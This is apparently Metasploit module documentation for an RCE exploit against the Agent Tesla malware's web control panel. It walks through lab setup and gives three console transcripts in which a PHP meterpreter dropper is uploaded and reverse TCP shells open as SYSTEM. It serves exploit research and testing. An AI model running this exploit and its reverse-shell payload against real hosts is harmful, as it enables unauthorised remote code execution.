## Vulnerable Application ### Description This module exploits a command injection vulnerability within the control center of Agent Tesla. Attackers can turn this vulnerability into an RCE that can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the `WebPanel/server_side/scripts/server_processing.php` file. On versions prior to September 12th 2018, attackers can exploit this vulnerability to gain unauthenticated RCE as the user running the web server. Versions released on or after September 12th 2018 have the following fix that was introduced which means that attackers will require valid credentials in order to exploit this vulnerability: ``` session_start(); if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) { header('Location: login.php'); exit; } ``` **NOTE:** Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to locate several Agent Tesla web panels available for download. As there are no version numbers displayed in the Agent Tesla control center, it was hard to identify exactly which releases were available for download. However it was possible to determine roughly when various editions of Agent Tesla were released by using the timestamps on the files contained in the `zip` archives. From this information, it was determined that [CyberCrime Tracker](https://cybercrime-tracker.net/) had the following unique versions available for download: [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) * Released in 2017 * Unauthenticated RCE * Source code protected by `ioncube`. * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 5.6.40. [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) * Released in 2018 * Authenticated RCE * Source code protected by `ioncube`. * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 7.2.18. [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) * Released in 2019 * Authenticated RCE * Plain text source code, `ioncube` is **not** needed. * Tested on Windows 7 x64 WAMP server 3.2.0 x64 and PHP version 5.6.40. ### Setup #### Using Windows ##### Install WAMP Server 3.2.0 on Windows 10 x64 1. Download the latest version of [WAMP Server](https://sourceforge.net/projects/wampserver/files/latest/download) and install it using the default settings. 2. Search for `Wamp` within the search bar and click on the result titled `Wampserver64`, or run `C:\\wamp64\\wampmanager.exe`. 3. Wait for the application to start, and then right click on the purple/green W within the tray and ***check*** `Wamp Settings > Allow VirtualHost local IP's others than 127.*`. 4. Open `c:/wamp64/bin/apache/apache2.4.41/conf/extra/httpd-vhosts.conf` and replace the line `Require local` with `Require all granted`. 5. Select PHP version 5.6.40 by selecting `PHP > Version > 5.6.40` (***left click*** on started application icon) and wait for the icon to go from brown to green again. 6. Browse to `http://127.0.0.1/phpmyadmin/` and log in with the username `root` and a blank password. 7. On the page `http://127.0.0.1/phpmyadmin/index.php`, find the list of databases on the left hand side of the page and click the `New` button above it. 8. Under the `Create database` section, set the database name to `tesla` and set the text type to `utf8_general_ci`. Then click the `Create` button. 9. Confirm the database was created, and afterwards log out of `PHPMyAdmin`. 9. Unzip one of the 7zip files. You should see a folder called `WebPanel` that is contained within. Copy this folder to `C:\wamp64\www`. 10. Delete the file at `C:\wamp\www\WebPanel\config.php` if it exists. 11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions to install `IonCube` in the [Installing Ioncube](#Installing%20Ioncube) section. 11. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out and then browse to `http://127.0.0.1/WebPanel/setup.php`. 12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field, set the `Database Name` field to `tesla` and set the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as. 13. Browse to `http://127.0.0.1/WebPanel/login.php` and confirm you can log into the web panel and view the main web panel itself. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded. #### Installing Ioncube ##### Windows Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Install%20WAMP%20Server%203.2.0%20on%20Windows%2010%20x64) steps. 1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.zip). 2. Make sure you have the proper version of PHP selected within `Wamp` for the WebPanel you want install before using `ioncube loader wizard`. * For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) you need PHP 5.6.40. * For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you can use PHP 7.2.18 or PHP 7.3.12. 3. Uncompress the contents of `loader-wizard.zip` into `C:\Wamp64\www\loader-wizard`. 4. Browse to http://localhost/loader-wizard/ioncube/loader-wizard.php. 5. Select `Local install` 6. Follow the installation instructions. 7. Right click on the WAMP tray icon and click `Refresh`. 8. Browse to `http://127.0.0.1/loader-wizard/ioncube/loader-wizard.php?timeout=0&ini=0&page=loader_check` and verify that ionCube Loader was installed successfully. ## Verification Steps Follow [Setup](#Setup) and [Scenarios](#Scenarios). ## Options ### PASSWORD The Agent Tesla CnC password to authenticate with (needed for authenticated RCE exploitation). ### TARGETURI The base URI path of control center. Default: '/WebPanel' ### USERNAME The Agent Tesla CnC username to authenticate with (needed for authenticated RCE exploitation). ## Targets ``` Id Name -- ---- 0 Automatic (Dropper) 1 Unix (In-Memory) 2 Windows (In-Memory) ``` ## Scenarios ### WebPanel1.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 5.6.40, Apache 2.4.41, MariaDB 10.4.10 ``` msf5 > use exploit/multi/http/agent_tesla_panel_rce msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 LHOST => 169.254.115.5 msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 RHOSTS => 169.254.162.16 msf5 exploit(multi/http/agent_tesla_panel_rce) > show options Module options (exploit/multi/http/agent_tesla_panel_rce): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The Agent Tesla CnC password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 169.254.162.16 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /WebPanel/ yes The URI where the Agent Tesla CnC panel is located on the target USERNAME no The Agent Tesla CnC username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 169.254.115.5 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (PHP-Dropper) msf5 exploit(multi/http/agent_tesla_panel_rce) > set LPORT 6633 LPORT => 6633 msf5 exploit(multi/http/agent_tesla_panel_rce) > check [+] 169.254.162.16:80 - The target is vulnerable. msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit [*] Started reverse TCP handler on 169.254.115.5:6633 [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. [*] Targeted operating system is: windows [*] Sending php/meterpreter/reverse_tcp command payload [*] Payload uploaded as: .rzzg.php to C:\wamp64\www\\WebPanel\\server_side\scripts\.rzzg.php [*] Sending stage (38288 bytes) to 169.254.162.16 [*] Meterpreter session 1 opened (169.254.115.5:6633 -> 169.254.162.16:51956) at 2020-06-16 16:01:57 -0500 [+] Deleted C:\wamp64\www\\WebPanel\\server_side\scripts\.rzzg.php meterpreter > getuid Server username: SYSTEM (0) meterpreter > sysinfo Computer : DESKTOP-EMAVUN1 OS : Windows NT DESKTOP-EMAVUN1 10.0 build 18363 (Windows 10) AMD64 Meterpreter : php/windows meterpreter > ls Listing: C:\wamp64\www\WebPanel\server_side\scripts =================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 2244 fil 2016-09-21 18:10:39 -0500 ids-arrays.php 100666/rw-rw-rw- 2235 fil 2016-09-21 18:10:39 -0500 ids-objects.php 100666/rw-rw-rw- 2069 fil 2016-09-21 18:10:39 -0500 jsonp.php 100666/rw-rw-rw- 7959 fil 2016-09-21 18:10:40 -0500 mysql.sql 100666/rw-rw-rw- 1453 fil 2016-09-21 18:10:40 -0500 objects.php 100666/rw-rw-rw- 1957 fil 2016-09-21 18:10:40 -0500 post.php 100666/rw-rw-rw- 7921 fil 2016-09-21 18:10:40 -0500 postgres.sql 100666/rw-rw-rw- 1500 fil 2017-08-14 16:48:16 -0500 server_processing.php 100666/rw-rw-rw- 7857 fil 2016-09-21 18:10:40 -0500 sqlite.sql 100666/rw-rw-rw- 8021 fil 2016-09-21 18:10:40 -0500 sqlserver.sql 100666/rw-rw-rw- 14438 fil 2016-09-30 04:53:10 -0500 ssp.class.php meterpreter > ``` ### WebPanel2.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 7.3.12, Apache 2.4.41, MariaDB 10.4.10 ``` msf5 > use exploit/multi/http/agent_tesla_panel_rce msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 LHOST => 169.254.115.5 msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test USERNAME => test msf5 exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test PASSWORD => test msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 RHOSTS => 169.254.162.16 msf5 exploit(multi/http/agent_tesla_panel_rce) > show options Module options (exploit/multi/http/agent_tesla_panel_rce): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD test no The Agent Tesla CnC password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 169.254.162.16 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /WebPanel/ yes The URI where the Agent Tesla CnC panel is located on the target USERNAME test no The Agent Tesla CnC username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 169.254.115.5 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (PHP-Dropper) msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit [*] Started reverse TCP handler on 169.254.115.5:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. [*] Targeted operating system is: windows [*] Sending php/meterpreter/reverse_tcp command payload [*] Payload uploaded as: .UKtE.php to C:\wamp64\www\\WebPanel\\server_side\scripts\.UKtE.php [*] Sending stage (38288 bytes) to 169.254.162.16 [*] Meterpreter session 1 opened (169.254.115.5:4444 -> 169.254.162.16:51698) at 2020-06-16 14:55:19 -0500 [+] Deleted C:\wamp64\www\\WebPanel\\server_side\scripts\.UKtE.php meterpreter > ls Listing: C:\wamp64\www\WebPanel\server_side\scripts =================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 2244 fil 2016-09-21 18:10:39 -0500 ids-arrays.php 100666/rw-rw-rw- 2235 fil 2016-09-21 18:10:39 -0500 ids-objects.php 100666/rw-rw-rw- 2069 fil 2016-09-21 18:10:39 -0500 jsonp.php 100666/rw-rw-rw- 7959 fil 2016-09-21 18:10:40 -0500 mysql.sql 100666/rw-rw-rw- 1453 fil 2016-09-21 18:10:40 -0500 objects.php 100666/rw-rw-rw- 1957 fil 2016-09-21 18:10:40 -0500 post.php 100666/rw-rw-rw- 7921 fil 2016-09-21 18:10:40 -0500 postgres.sql 100666/rw-rw-rw- 1642 fil 2018-09-11 17:31:16 -0500 server_processing.php 100666/rw-rw-rw- 7857 fil 2016-09-21 18:10:40 -0500 sqlite.sql 100666/rw-rw-rw- 8021 fil 2016-09-21 18:10:40 -0500 sqlserver.sql 100666/rw-rw-rw- 14438 fil 2016-09-30 04:53:10 -0500 ssp.class.php meterpreter > sysinfo Computer : DESKTOP-EMAVUN1 OS : Windows NT DESKTOP-EMAVUN1 10.0 build 18363 (Windows 10) AMD64 Meterpreter : php/windows meterpreter > getuid Server username: SYSTEM (0) meterpreter > ``` ### WebPanel3.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 7.3.12, Apache 2.4.41, MariaDB 10.4.10 ``` msf5 > use exploit/multi/http/agent_tesla_panel_rce msf5 exploit(multi/http/agent_tesla_panel_rce) > show options Module options (exploit/multi/http/agent_tesla_panel_rce): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The Agent Tesla CnC password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /WebPanel/ yes The URI where the Agent Tesla CnC panel is located on the target USERNAME no The Agent Tesla CnC username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (PHP-Dropper) msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 RHOSTS => 169.254.162.16 msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 LHOST => 169.254.115.5 msf5 exploit(multi/http/agent_tesla_panel_rce) > set LPORT 5566 LPORT => 5566 msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test USERNAME => test msf5 exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test PASSWORD => test msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit [*] Started reverse TCP handler on 169.254.115.5:5566 [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. [*] Targeted operating system is: windows [*] Sending php/meterpreter/reverse_tcp command payload [*] Payload uploaded as: .RVfu.php to C:\wamp64\www\\WebPanel\\server_side\scripts\.RVfu.php [*] Sending stage (38288 bytes) to 169.254.162.16 [*] Meterpreter session 1 opened (169.254.115.5:5566 -> 169.254.162.16:51840) at 2020-06-16 15:14:12 -0500 [+] Deleted C:\wamp64\www\\WebPanel\\server_side\scripts\.RVfu.php meterpreter > getuid Server username: SYSTEM (0) meterpreter > sysinfo Computer : DESKTOP-EMAVUN1 OS : Windows NT DESKTOP-EMAVUN1 10.0 build 18363 (Windows 10) AMD64 Meterpreter : php/windows meterpreter > ls Listing: C:\wamp64\www\WebPanel\server_side\scripts =================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 2244 fil 2016-09-21 15:10:40 -0500 ids-arrays.php 100666/rw-rw-rw- 2235 fil 2016-09-21 15:10:40 -0500 ids-objects.php 100666/rw-rw-rw- 2069 fil 2016-09-21 15:10:40 -0500 jsonp.php 100666/rw-rw-rw- 1453 fil 2016-09-21 15:10:40 -0500 objects.php 100666/rw-rw-rw- 1957 fil 2016-09-21 15:10:40 -0500 post.php 100666/rw-rw-rw- 1642 fil 2018-09-11 14:31:18 -0500 server_processing.php 100666/rw-rw-rw- 14438 fil 2016-09-30 01:53:10 -0500 ssp.class.php meterpreter > cd "C:\\Windows\\" meterpreter > pwd C:\Windows meterpreter > upload README.md [*] uploading : README.md -> README.md [*] Uploaded -1.00 B of 2.67 KiB (-0.04%): README.md -> README.md [*] uploaded : README.md -> README.md meterpreter > ls Listing: C:\Windows =================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- ... 100666/rw-rw-rw- 34925 fil 2019-03-18 23:46:33 -0500 Professional.xml 40777/rwxrwxrwx 0 dir 2020-04-10 12:14:25 -0500 Provisioning 100666/rw-rw-rw- 2734 fil 2020-06-16 15:14:53 -0500 README.md ... meterpreter > ls README.md 100666/rw-rw-rw- 2734 fil 2020-06-16 15:14:53 -0500 README.md ```